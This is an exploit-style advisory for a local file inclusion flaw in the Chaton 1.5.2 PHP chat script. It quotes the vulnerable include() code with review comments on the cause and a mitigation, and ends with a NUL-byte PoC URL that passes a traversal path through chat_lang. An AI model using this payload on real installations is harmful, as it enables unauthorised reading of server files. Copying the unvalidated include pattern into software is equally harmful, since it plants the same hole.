[+] Chaton <= 1.5.2 Local File Include Vulnerability
|
|
[+] Discovered By: cr4wl3r
|
|
[+] Download: http://easy-script.com/scripts-dl/chaton-1.5.2.zip
|
|
[+] Greetz: opt!x hacker, xoron, cyberlog, mywisdom, irvian, EA ngel, bL4Ck_3n91n3, xharu, zvtral, and all my friends
|
|
|
|
[+] Code:
|
|
|
|
// Includes the language file for $chat_lang when it exists on disk.
// NOTE(review): $chat_lang is interpolated into the path with no validation in
// this excerpt. The PoC on this page passes it as a request parameter, so it is
// presumably request-controlled (e.g. through register_globals — not shown here;
// confirm against the full file).
// file_exists() only checks that the resulting path exists; it does not confine
// the path to lang/. On PHP before 5.3.4 an embedded NUL byte also cuts off the
// fixed "/deplacer.php" suffix, which is what the %00 in the PoC relies on.
// Mitigation: accept $chat_lang only if it strictly matches an entry in a fixed
// list of installed language directories, and initialise it server-side rather
// than from the request.
if (file_exists( "lang/$chat_lang/deplacer.php")) {
|
|
include( "lang/$chat_lang/deplacer.php");
|
|
}
|
|
|
|
if ($chat_salon != $newsalon) {
|
|
if ($chat_hide == false) {
|
|
// Salle publique = Recupere le vrai nom
|
|
$nomsalle = NomSalonPublic( $newsalon);
|
|
if ($nomsalle == '') {
|
|
// Salon priv?
|
|
$salon_prive = true;
|
|
$nomsalle = $newsalon;
|
|
} else {
|
|
$salon_prive = false;
|
|
}
|
|
|
|
[+] PoC: [path]/inc/deplacer.php?chat_lang=[LFI%00]